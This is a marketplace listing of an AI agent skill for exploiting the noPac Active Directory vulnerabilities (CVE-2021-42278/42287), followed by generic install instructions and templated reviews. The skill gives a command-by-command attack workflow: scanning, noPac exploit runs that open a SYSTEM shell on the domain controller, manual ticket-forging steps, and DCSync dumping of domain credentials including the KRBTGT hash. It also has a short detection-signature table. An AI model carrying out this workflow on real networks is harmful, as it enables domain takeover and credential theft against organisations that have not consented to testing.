exploiting-nopac-cve-2021-42278-42287

mukul975/Anthropic-Cybersecurity-Skills · updated May 25, 2026

MDX-style export adds YAML metadata + attribution linking explainx.ai and this canonical listing URL.

$npx skills install mukul975/Anthropic-Cybersecurity-Skills/exploiting-nopac-cve-2021-42278-42287
0 commentsdiscussion
summary

Exploit the noPac vulnerability chain (CVE-2021-42278 sAMAccountName spoofing and CVE-2021-42287 KDC PAC confusion) to escalate from standard domain user to Domain Admin in Active Directory environments.

skill.md
name
exploiting-nopac-cve-2021-42278-42287
description
Exploit the noPac vulnerability chain (CVE-2021-42278 sAMAccountName spoofing and CVE-2021-42287 KDC PAC confusion) to escalate from standard domain user to Domain Admin in Active Directory environments.
domain
cybersecurity
subdomain
red-teaming
tags
- red-team - active-directory - nopac - cve-2021-42278 - cve-2021-42287 - privilege-escalation - domain-escalation
version
'1.0'
author
mahipal
license
Apache-2.0
d3fend_techniques
- Platform Monitoring - Process Code Segment Verification - Stack Frame Canary Validation - Segment Address Offset Randomization - Process Analysis
nist_csf
- ID.RA-01 - GV.OV-02 - DE.AE-07

Exploiting noPac (CVE-2021-42278 / CVE-2021-42287)

Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

Overview

noPac is a critical exploit chain combining two Active Directory vulnerabilities: CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion). Together, they allow any authenticated domain user to escalate to Domain Admin privileges, potentially achieving full domain compromise in under 60 seconds. CVE-2021-42278 allows an attacker to modify a machine account's sAMAccountName attribute to match a Domain Controller's name (minus the trailing $). CVE-2021-42287 exploits a flaw in the Kerberos PAC validation where the KDC, unable to find the renamed account, falls back to appending $ and issues a ticket for the Domain Controller account. Microsoft patched both vulnerabilities in November 2021 (KB5008380 and KB5008602), but many environments remain unpatched. The exploit was publicly released by cube0x0 and Ridter in December 2021.

When to Use

  • When performing authorized security testing that involves exploiting nopac cve 2021 42278 42287
  • When analyzing malware samples or attack artifacts in a controlled environment
  • When conducting red team exercises or penetration testing engagements
  • When building detection capabilities based on offensive technique understanding

Prerequisites

  • Familiarity with red teaming concepts and tools
  • Access to a test or lab environment for safe execution
  • Python 3.8+ with required dependencies installed
  • Appropriate authorization for any testing activities

Objectives

  • Scan the target domain for noPac vulnerability (CVE-2021-42278/42287)
  • Create or leverage a machine account with modified sAMAccountName
  • Exploit the KDC PAC confusion to obtain a TGT for the Domain Controller
  • Use the DC ticket to perform DCSync and dump domain credentials
  • Achieve Domain Admin access from a standard domain user account
  • Document the complete exploitation chain with evidence

MITRE ATT&CK Mapping

  • T1068 - Exploitation for Privilege Escalation
  • T1136.002 - Create Account: Domain Account
  • T1078.002 - Valid Accounts: Domain Accounts
  • T1558 - Steal or Forge Kerberos Tickets
  • T1003.006 - OS Credential Dumping: DCSync

Workflow

Phase 1: Vulnerability Scanning

  1. Check if the domain is vulnerable using the noPac scanner:
    # Using cube0x0's noPac scanner
    python3 scanner.py domain.local/user:'Password123' -dc-ip 10.10.10.1
    
    # Using CrackMapExec module
    crackmapexec smb 10.10.10.1 -u user -p 'Password123' -M nopac
    
  2. Verify the MachineAccountQuota (default is 10, allows any user to join computers):
    # Check MachineAccountQuota via LDAP
    python3 -c "
    import ldap3
    server = ldap3.Server('10.10.10.1')
    conn = ldap3.Connection(server, 'domain.local\\user', 'Password123', auto_bind=True)
    conn.search('DC=domain,DC=local', '(objectClass=domain)', attributes=['ms-DS-MachineAccountQuota'])
    print(conn.entries[0]['ms-DS-MachineAccountQuota'])
    "
    

Phase 2: Exploitation with noPac Tool

  1. Run the full noPac exploit chain:
    # Using cube0x0's noPac (gets a shell on the DC)
    python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \
      -dc-host DC01 -shell --impersonate administrator -use-ldap
    
    # Using Ridter's noPac (alternative implementation)
    python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \
      --impersonate administrator -dump
    
  2. The exploit automatically:
    • Creates a new machine account (or uses an existing one)
    • Renames the machine account's sAMAccountName to match the DC (e.g., "DC01")
    • Requests a TGT for the spoofed account name
    • Restores the original sAMAccountName
    • Uses S4U2self to obtain a service ticket impersonating the target user
    • The KDC finds no account matching "DC01" and falls back to "DC01$" (the real DC)

Phase 3: Post-Exploitation

  1. With the obtained Domain Controller ticket, perform DCSync:
    # DCSync using secretsdump.py with the Kerberos ticket
    export KRB5CCNAME=administrator.ccache
    secretsdump.py -k -no-pass domain.local/[email protected]
    
    # Or directly through the noPac shell
    # The shell runs as SYSTEM on the DC
    
  2. Alternatively, obtain a semi-interactive shell:
    python3 noPac.py domain.local/user:'Password123' -dc-ip 10.10.10.1 \
      -dc-host DC01 -shell --impersonate administrator -use-ldap
    

Phase 4: Manual Exploitation Steps

  1. Create a machine account:
    addcomputer.py -computer-name 'ATTACKPC$' -computer-pass 'AttackPass123' \
      -dc-ip 10.10.10.1 domain.local/user:'Password123'
    
  2. Clear the SPN and rename sAMAccountName:
    # Rename machine account sAMAccountName to DC name (without $)
    renameMachine.py -current-name 'ATTACKPC$' -new-name 'DC01' \
      -dc-ip 10.10.10.1 domain.local/user:'Password123'
    
  3. Request a TGT for the spoofed name:
    getTGT.py -dc-ip 10.10.10.1 domain.local/'DC01':'AttackPass123'
    
  4. Restore the original machine name:
    renameMachine.py -current-name 'DC01' -new-name 'ATTACKPC$' \
      -dc-ip 10.10.10.1 domain.local/user:'Password123'
    
  5. Use S4U2self for impersonation:
    export KRB5CCNAME=DC01.ccache
    getST.py -self -impersonate 'administrator' -altservice 'cifs/DC01.domain.local' \
      -k -no-pass -dc-ip 10.10.10.1 domain.local/'ATTACKPC$'
    

Tools and Resources

ToolPurposePlatform
noPac (cube0x0)Automated scanner and exploiterPython
noPac (Ridter)Alternative exploit implementationPython
ImpacketKerberos ticket manipulation, DCSyncPython
CrackMapExecVulnerability scanning modulePython
RubeusWindows Kerberos ticket operationsWindows (.NET)
secretsdump.pyPost-exploitation credential dumpingPython

CVE Details

CVEDescriptionCVSSPatch
CVE-2021-42278sAMAccountName spoofing (machine accounts)7.5KB5008102
CVE-2021-42287KDC PAC confusion / privilege escalation7.5KB5008380

Detection Signatures

IndicatorDetection Method
Machine account sAMAccountName changeEvent 4742 (computer account changed) with sAMAccountName modification
New machine account creationEvent 4741 (computer object created)
TGT request for account without trailing $Kerberos audit log analysis
S4U2self requests from non-DC machine accountsEvent 4769 with unusual service ticket requests
Rapid sequence: create account, rename, request TGTSIEM correlation rule for noPac attack pattern

Validation Criteria

  • Domain scanned for noPac vulnerability
  • MachineAccountQuota verified (default 10)
  • Exploit executed successfully (shell or DCSync)
  • Domain Admin privileges obtained from standard user
  • DCSync performed to dump domain credentials
  • KRBTGT hash obtained for persistence validation
  • Attack chain documented with timestamps
  • Patch status verified (KB5008380, KB5008602)
how to use exploiting-nopac-cve-2021-42278-42287

How to use exploiting-nopac-cve-2021-42278-42287 on Cursor

AI-first code editor with Composer

1

Prerequisites

Before installing skills in Cursor, ensure your development environment meets these requirements:

  • Cursor installed and configured on your development machine
  • Node.js version 16.0+ with npm package manager (verify with node --version)
  • Active project directory or workspace where you want to add exploiting-nopac-cve-2021-42278-42287
2

Execute installation command

Execute the skills CLI command in your project's root directory to begin installation:

$npx skills install mukul975/Anthropic-Cybersecurity-Skills/exploiting-nopac-cve-2021-42278-42287

The skills CLI fetches exploiting-nopac-cve-2021-42278-42287 from GitHub repository mukul975/Anthropic-Cybersecurity-Skills and configures it for Cursor.

3

Select Cursor when prompted

The CLI will show a list of available agents. Use arrow keys to navigate and space to select Cursor:

◆ Which agents do you want to install to?
│ ── Universal (.agents/skills) ── always included ────
│ • Amp
│ • Antigravity
│ • Cline
│ • Codex
│ ●Cursor(selected)
│ • Cursor
│ • Windsurf
4

Verify installation

Confirm successful installation by checking the skill directory location:

.cursor/skills/exploiting-nopac-cve-2021-42278-42287

Reload or restart Cursor to activate exploiting-nopac-cve-2021-42278-42287. Access the skill through slash commands (e.g., /exploiting-nopac-cve-2021-42278-42287) or your agent's skill management interface.

Security & Verification Notice

We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.

Skills execute code in your development environment. Always verify the publisher's identity, review recent commits, and test in isolated environments before production deployment.

List & Monetize Your Skill

Submit your Claude Code skill and start earning

GET_STARTED →

Use Cases

Task Automation & Efficiency

Automate repetitive workflows and reduce manual effort

Example

Generate reports, summarize documents, draft communications

Save 3-5 hours per week on routine tasks

Knowledge Enhancement

Learn new skills, understand complex topics, get expert guidance

Example

Explain concepts, provide examples, suggest learning resources

Accelerate learning and skill development by 2x

Quality Improvement

Enhance output quality through reviews, suggestions, and refinements

Example

Review drafts, suggest improvements, catch errors

Improve work quality by 30-40% with less effort

Implementation Guide

Prerequisites

  • Claude Desktop or compatible AI client with skill support
  • Clear understanding of task or problem to solve
  • Willingness to iterate and refine outputs

Time Estimate

15-45 minutes depending on use case complexity

Installation Steps

  1. 1.Install skill using provided installation command
  2. 2.Test with simple use case relevant to your work
  3. 3.Evaluate output quality and relevance
  4. 4.Iterate on prompts to improve results
  5. 5.Integrate into regular workflow if valuable

Common Pitfalls

  • Expecting perfect results without iteration
  • Not providing enough context in prompts
  • Using skill for tasks outside its intended scope
  • Accepting outputs without review and validation

Best Practices

✓ Do

  • +Start with clear, specific prompts
  • +Provide relevant context and constraints
  • +Review and refine all outputs before using
  • +Iterate to improve output quality
  • +Document successful prompt patterns

✗ Don't

  • Don't use without understanding skill limitations
  • Don't skip validation of outputs
  • Don't share sensitive information in prompts
  • Don't expect skill to replace human judgment

💡 Pro Tips

  • Be specific about desired format and style
  • Ask for multiple options to choose from
  • Request explanations to understand reasoning
  • Combine AI efficiency with human expertise

When to Use This

✓ Use When

Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.

✗ Avoid When

Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.

Learning Path

  1. 1Familiarize yourself with skill capabilities and limitations
  2. 2Start with low-risk, non-critical tasks
  3. 3Progress to more complex and valuable use cases
  4. 4Build expertise through regular use and experimentation

Discussion

Product Hunt–style comments (not star reviews)
  • No comments yet — start the thread.
general reviews

Ratings

4.427 reviews
  • Chaitanya Patil· Dec 12, 2024

    I recommend exploiting-nopac-cve-2021-42278-42287 for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.

  • Omar Lopez· Dec 12, 2024

    exploiting-nopac-cve-2021-42278-42287 has been reliable in day-to-day use. Documentation quality is above average for community skills.

  • Lucas Harris· Dec 8, 2024

    Useful defaults in exploiting-nopac-cve-2021-42278-42287 — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.

  • Mateo Liu· Nov 27, 2024

    I recommend exploiting-nopac-cve-2021-42278-42287 for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.

  • Piyush G· Nov 3, 2024

    Useful defaults in exploiting-nopac-cve-2021-42278-42287 — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.

  • Zara Verma· Nov 3, 2024

    exploiting-nopac-cve-2021-42278-42287 reduced setup friction for our internal harness; good balance of opinion and flexibility.

  • Shikha Mishra· Oct 22, 2024

    exploiting-nopac-cve-2021-42278-42287 has been reliable in day-to-day use. Documentation quality is above average for community skills.

  • Benjamin Thompson· Oct 22, 2024

    I recommend exploiting-nopac-cve-2021-42278-42287 for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.

  • Isabella Choi· Oct 18, 2024

    exploiting-nopac-cve-2021-42278-42287 reduced setup friction for our internal harness; good balance of opinion and flexibility.

  • Mia Okafor· Sep 1, 2024

    exploiting-nopac-cve-2021-42278-42287 fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.

showing 1-10 of 27

1 / 3